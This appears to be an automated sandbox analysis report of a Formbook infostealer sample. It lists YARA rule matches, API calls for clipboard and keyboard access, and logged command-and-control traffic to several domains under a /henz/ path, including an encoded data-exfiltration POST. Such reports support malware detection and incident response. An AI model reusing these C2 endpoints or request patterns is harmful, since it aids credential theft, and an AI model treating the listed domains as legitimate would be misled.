          Source: help.exe, 00000005.00000003.456470513.00000000003D3000.00000004.00000020.00020000.00000000.sdmp, -ODfqI49.5.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
          Source: help.exe, 00000005.00000002.569622242.0000000003B28000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.lyonfinancialusa.com/henz/?4hq=I97X75yj3reE70KD0jnZLHprtk7Ny9G/KKFZ2xPoakAfOE75REIszhxIs
          Source: unknownHTTP traffic detected: POST /henz/ HTTP/1.1Host: www.lyonfinancialusa.comConnection: closeContent-Length: 185Cache-Control: no-cacheOrigin: http://www.lyonfinancialusa.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.lyonfinancialusa.com/henz/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 34 68 71 3d 46 5f 54 33 34 4d 43 59 37 4c 4c 6c 35 30 36 46 70 55 6d 45 4c 6d 56 30 6d 31 6d 41 7e 59 47 31 45 72 5a 72 7a 51 72 43 4f 57 4d 4c 57 30 50 39 66 6d 38 71 30 51 56 44 6d 5a 39 4b 58 4c 58 59 43 47 67 65 67 44 28 54 4b 77 71 30 79 6a 6f 58 48 68 65 62 75 32 37 65 5a 42 62 45 69 45 6b 62 33 42 53 6a 35 64 4f 6e 57 42 38 78 4b 44 71 48 63 52 32 4b 48 38 32 37 68 43 41 6c 51 79 65 4e 57 59 50 55 32 4c 59 59 6e 75 74 6f 58 35 49 43 7a 65 73 58 73 41 4b 7a 4d 4c 79 53 41 5f 6b 2d 4b 4d 30 4f 32 5f 38 30 57 4c 61 6b 52 4f 65 51 4c 77 29 2e 00 00 00 00 00 00 00 00 Data Ascii: 4hq=F_T34MCY7LLl506FpUmELmV0m1mA~YG1ErZrzQrCOWMLW0P9fm8q0QVDmZ9KXLXYCGgegD(TKwq0yjoXHhebu27eZBbEiEkb3BSj5dOnWB8xKDqHcR2KH827hCAlQyeNWYPU2LYYnutoX5ICzesXsAKzMLySA_k-KM0O2_80WLakROeQLw).
          Source: unknownDNS traffic detected: queries for: www.eufidelizo.com
          Source: global trafficHTTP traffic detected: GET /henz/?4hq=wcp3urA+/rGtUuNVdXHur6CaD7Rg4XGXlvUWG7FdGjeYGPzd5j/g1Govvww0i9Uvwfj8E4D4P4OVv2O692M0flOUm4qON1Jqzg==&o8=wR-h28Gxg HTTP/1.1Host: www.eufidelizo.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /henz/?4hq=I97X75yj3reE70KD0jnZLHprtk7Ny9G/KKFZ2xPoakAfOE75REIszhxIs75pfZv/CVEdhBuwKxvuqF4TRlzEsULWUGP1g0EPzg==&o8=wR-h28Gxg HTTP/1.1Host: www.lyonfinancialusa.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /henz/?4hq=8TptbrIX6F4NxrWdTDNRTBReo0fMEuELv5cUeaX5N5UPFd9Hxy/eTVHt8QapNK2qZdoBzpjQ3MhBnX7XpU/EbwlnLs/kdjkkcQ==&o8=wR-h28Gxg HTTP/1.1Host: www.afterdarksocial.clubConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /henz/?4hq=5p9Ov6C7qce51hIp6D8A72je8vUJddN77lLEFw6Ufibk2yN56suG3zROnD+rS7baXFO6PfoGYvZY6sqA3kYcUTUl/8YIp7EDwQ==&o8=wR-h28Gxg HTTP/1.1Host: www.patrickguarte.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /henz/?4hq=P4ST2IJPckjMYpRf2FLdq0axEROKy7OOggEf6mHPhnME1yGBMW0egmkxYDI06dmXm7z7OVgXWzJ+YqSrULYkiycbwQA+qKMVmQ==&o8=wR-h28Gxg HTTP/1.1Host: www.brennancorps.infoConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /henz/?4hq=dpH6BKfQQ0cm5Imeo72RAP4DEbjLNfLp0vSyI4bn1RZjePkdeS9augOMgWVykt+ztx1R3MJW/gsn5nuFARzMtUktTfqb4tJ3+A==&o8=wR-h28Gxg HTTP/1.1Host: www.lopezmodeling.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /henz/?4hq=jIhXpQA4pSG2yYWBb37zpp/PG+nmQ9F5uiLrR0YNz1ez7r/FQUV2GqKIrgsyQUbvld7C5UuQUlYsY6nmozac85OtAKDr0AUC2A==&o8=wR-h28Gxg HTTP/1.1Host: www.foxwhistle.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 1_2_004050C0 OpenClipboard,GetClipboardData,GlobalLock,GlobalSize,VkKeyScanW,MapVirtualKeyW,GlobalUnlock,CloseClipboard,
          Source: Lc8xQv8iZY.exe, 00000000.00000002.312089969.00000000006BA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 1_2_00404020 GetKeyboardState,
          Source: C:\Users\user\Desktop\Lc8xQv8iZY.exeCode function: 0_2_00405125 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,

          E-Banking Fraud

          barindex
          Source: Yara matchFile source: 3.2.hvbvmxm.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.hvbvmxm.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000003.00000002.385960005.00000000005A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000000.353715977.000000000D6C1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.568390844.0000000003040000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.568316286.0000000002D40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000000.376694506.000000000D6C1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.386021250.00000000005D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.567455523.0000000000270000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.385717427.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

          System Summary

          barindex
          Source: 3.2.hvbvmxm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 3.2.hvbvmxm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.2.hvbvmxm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 3.2.hvbvmxm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 3.2.hvbvmxm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.2.hvbvmxm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.385960005.00000000005A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000003.00000002.385960005.00000000005A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.385960005.00000000005A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000000.353715977.000000000D6C1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000004.00000000.353715977.000000000D6C1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000000.353715977.000000000D6C1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.568390844.0000000003040000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000005.00000002.568390844.0000000003040000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.568390844.0000000003040000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.568316286.0000000002D40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000005.00000002.568316286.0000000002D40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.568316286.0000000002D40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000000.376694506.000000000D6C1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000004.00000000.376694506.000000000D6C1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000000.376694506.000000000D6C1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.386021250.00000000005D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000003.00000002.386021250.00000000005D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.386021250.00000000005D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.567455523.0000000000270000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000005.00000002.567455523.0000000000270000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.567455523.0000000000270000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.385717427.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000003.00000002.385717427.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.385717427.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: Process Memory Space: hvbvmxm.exe PID: 5420, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: Process Memory Space: help.exe PID: 1900, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: Lc8xQv8iZY.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
          Source: 3.2.hvbvmxm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 3.2.hvbvmxm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.2.hvbvmxm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 3.2.hvbvmxm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 3.2.hvbvmxm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.2.hvbvmxm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.385960005.00000000005A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000003.00000002.385960005.00000000005A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.385960005.00000000005A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000000.353715977.000000000D6C1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000004.00000000.353715977.000000000D6C1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000000.353715977.000000000D6C1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.568390844.0000000003040000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000005.00000002.568390844.0000000003040000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.568390844.0000000003040000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.568316286.0000000002D40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000005.00000002.568316286.0000000002D40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.568316286.0000000002D40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000000.376694506.000000000D6C1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000004.00000000.376694506.000000000D6C1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000000.376694506.000000000D6C1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.386021250.00000000005D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000003.00000002.386021250.00000000005D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.386021250.00000000005D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.567455523.0000000000270000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000005.00000002.567455523.0000000000270000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.567455523.0000000000270000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.385717427.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000003.00000002.385717427.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.385717427.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: Process Memory Space: hvbvmxm.exe PID: 5420, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: Process Memory Space: help.exe PID: 1900, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: C:\Users\user\Desktop\Lc8xQv8iZY.exeCode function: 0_2_0040324F EntryPoint,SetErrorMode,GetVersion,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,ExitProcess,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,
          Source: C:\Users\user\Desktop\Lc8xQv8iZY.exeCode function: 0_2_00406333
          Source: C:\Users\user\Desktop\Lc8xQv8iZY.exeCode function: 0_2_00404936
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 1_2_004168DD
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 1_2_0040B504
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 1_2_0040C24D
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 1_2_0040BA00
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 1_2_0040BE18
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 1_2_0040C682
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 1_2_00B80227
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 1_2_00B804D1
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_004012B0
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_0042193D
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00421284
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_004012A4
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_0040B453
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_0040B457
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00422429
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_004044C7
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_004044BE
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_004046E7
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_0040FE87
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00AE20A0
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00B820A8
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00ACB090
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00B828EC
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00B8E824
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 3_2_00B71002
